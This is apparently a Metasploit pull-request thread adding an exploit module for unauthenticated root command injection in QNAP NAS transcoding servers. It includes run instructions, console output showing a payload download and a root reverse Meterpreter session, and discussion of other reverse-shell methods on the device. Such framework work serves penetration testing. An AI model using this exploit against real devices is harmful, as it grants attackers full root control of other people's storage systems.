Add QNAP Transcode Server Command Execution exploit module

[bcoles]

This PR adds an unauthenticated remote root command injection exploit for the transcoding server enabled by default on QNAP NAS devices.

    This module exploits an unauthenticated remote command injection
    vulnerability in QNAP NAS devices. The transcoding server listens
    on port 9251 by default and is vulnerable to command injection
    using the 'rmfile' command.

    This module was tested successfully on a QNAP TS-431 with
    firmware version 4.3.3.0262 (20170727).

Verification

• Start msfconsole
• Do: use exploit/linux/misc/qnap_transcode_server
• Do: set RHOST [IP]
• Do: set LHOST [IP]
• Do: run
• You should get a session

Example Output

msf > use exploit/linux/misc/qnap_transcode_server 
msf exploit(qnap_transcode_server) > set rhost 10.1.1.123
rhost => 10.1.1.123
msf exploit(qnap_transcode_server) > check
[*] 10.1.1.123:9251 The target service is running, but could not be validated.
msf exploit(qnap_transcode_server) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf exploit(qnap_transcode_server) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm
[*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm
[*] 10.1.1.123:9251 - Sent command successfully (52 bytes)
[*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)...
[*] 10.1.1.123:9251 - Sent command successfully (22 bytes)
[*] 10.1.1.123:9251 - Sent command successfully (13 bytes)
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400
[*] 10.1.1.123:9251 - Sent command successfully (19 bytes)
[*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes)
[*] 10.1.1.123:9251 - Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 10.1.1.123
OS           :  (Linux 3.2.26)
Architecture : armv7l
Meterpreter  : armle/linux

[sempervictus]

Awesome, thank you sir. Do we have a shell payload option for the arch? Meterp transport is in flux right now, so might be nice to add that. Maybe also an openssl double or a plain shell rev_tcp?

[bcoles]

@sempervictus I decided against supporting unix/cmd style payloads.

I believe meterpreter is preferred over CMD payloads where possible. A lot of the modules for embedded devices only support meterpreter.

There's also a whole bunch of characters which are filtered which makes parsing CMD payloads annoying.

That said, I know reverse bash CMD works on QNAP from shellsheck days. The openssl, awk and python binaries are also present. There's also the BusyBox telnetd technique.

There's no nc or netcat binary, although a pre-compiled binary could be dropped easily enough.

Also worth noting that there's also no base64 binary.

[bcoles]

As an aside, it would be nice if there was a way to determine when the payload has been downloaded, rather than using Rex.sleep. A bunch of modules make use of DELAY or HTTP_DELAY options for this purpose.

# grep -rl "DELAY" modules/exploits/ | wc -l
40

I know it's possible to detect the connect back with on_client_connect or on_request_uri, but as far as I know there's no easy and reliable way to determine when the download is complete, ie. on_client_disconnect.

[sempervictus]

Fun. Agreed it's a waste of effort to deal with char filter bypass. Python meterp however, should be doable, and we can use it as our base64 -d equivalent.

[bcoles]

What does the Python meterpreter give us that the native compiled ARMLE meterpreter does not?

[0x00string]

awesome

[wvu-r7]

Thanks!!

[tdoan-r7]

Release Notes

An exploit that targets an unauthenticated remote command injection vulnerability in QNAP NAS devices has been added to framework. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command.